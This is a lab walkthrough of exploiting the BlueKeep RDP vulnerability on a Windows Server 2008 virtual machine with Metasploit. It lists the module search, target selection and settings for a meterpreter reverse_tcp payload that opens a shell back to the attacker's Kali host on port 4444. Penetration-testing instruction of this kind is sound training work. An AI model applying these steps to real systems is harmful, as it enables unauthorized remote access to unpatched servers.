Exploitation
After reconnaissance and scanning, we will proceed to gain unauthorized access to the target machine via exploiting the RDP vulnerability using the Metasploit tool in Kali Linux virtual machine environment.
Firstly, enter the"msfconsole" command to start the Metasploit framework.
Secondly, use the"search blue keep" command is executed to find available modules pertaining to bluekeep exploit.
We will be using module number "1" as it contains the actual bluekeep exploit and scanner while option "0" only contains the scanner.
.png)
We would proceed to define the settings for our exploit & payload modules. We would be using meterpreter/reverse_tcp as the payload.
.png)
1. Set payload to reverse_tcp
2. Set RHOSTS to target machine IP Address (Windows Server 2008)
3. Set LHOSTS to Kali Linux IP Address
4. Set LPORT to 4444 (Kali Linux)
Thirdly, execute the "show options" command to double-check if the configuration settings made in the previous sections are right.
In addition, RDP_CLIENT_IP is to be set to the same subnet as the IP address of the device that you run the exploit from as this is a client to server attack. The configuration would thus allow for an RDP connection and allow the exploitation to work.
(Optional) Change GROOMSIZE parameter to 50 relates to the size of data chunks sent to the target machine. The GROOMSIZE is set to a lower value than the default to prevent crashes when working with virtual machines.
.png)
As shown from the above screenshot, the exploit target is not yet specified. Thus, execute the "show targets" command to see which targets are available for selection.
.png)
As there is more than one Windows 2008 server available for selection, we look for the VMware version in use and select the specific target. For our case, we will select the target number "5".
.png)